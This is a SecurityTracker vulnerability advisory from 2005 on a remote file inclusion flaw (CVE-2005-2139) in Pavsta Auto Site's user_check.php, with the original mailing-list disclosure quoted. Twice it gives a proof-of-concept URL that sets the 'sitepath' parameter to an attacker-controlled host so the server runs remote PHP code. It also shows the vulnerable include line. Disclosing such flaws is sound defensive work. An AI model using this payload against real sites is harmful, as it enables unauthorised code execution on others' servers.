SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Your Ad Here
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Sign Up!





Category:  Application (Forum/Board/Portal)  >  Pavsta Auto Site Vendors:  Pavsta.com
Pavsta Auto Site 'user_check.php' Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014321
SecurityTracker URL:  http://securitytracker.com/id?1014321
CVE Reference:  CVE-2005-2139   (Links to External Site)
Updated:  Jun 24 2008
Original Entry Date:  Jun 29 2005
Impact:  Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Description:  V4mu from [A]nomaly [1]n [T]he [S]ystem CreW discovered a vulnerability in Pavsta Auto Site. A remote user can execute arbitrary commands on the target system.

The 'user_check.php' script includes the 'functions.php' script relative to the user-supplied 'sitepath' parameter without properly validating the parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/user_check.php?sitepath=http://[attacker]
Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.pavsta.com/freescripts.php?action=pavstaautosite (Links to External Site)
Cause:  Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  skdaemon porra <skdaemon@gmail.com>
Message History:   None.

 Source Message Contents
Date:  Wed, 29 Jun 2005 00:31:59 -0300
From:  skdaemon porra <skdaemon@gmail.com>
Subject:  PavstaAutoSite remote file inclusion

 
 
bug founded by V4mu from A1TS
 
Vulnerable php script: PavstaAutoSite
Released on: 22th September 2004
Description: Need a Script that does lots of different things?
Including... User System, News System, Message Boards, Private
messaging, Statistics, Admin Panel, Profiles and lots, lots more.....
Well 'The Pavsta Auto Site' does all of this and much more!
 
in user_check.php on line 3:
 
include_once("$sitepath/functions.php");
 
$sitepath is declared in config.php but in this unique file they don't
include config.php, so $sitepath is just a normal not inicializated
variable that can allow
remote attackers to include a malicious code:
 
PoC:
 
http://www.target.com/user_check.php?sitepath=http://[attacker]
 
[A]nomaly [1]n [T]he [S]ystem CreW 2oO5
 
greetz to sky  :) 
 
We are:
 
V4mu <*> S0l4r1s <*> r3ckd4ll <*> paulinhu 
 
irc.gigachat.net on #A1TS


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2007, SecurityGlobal.net LLC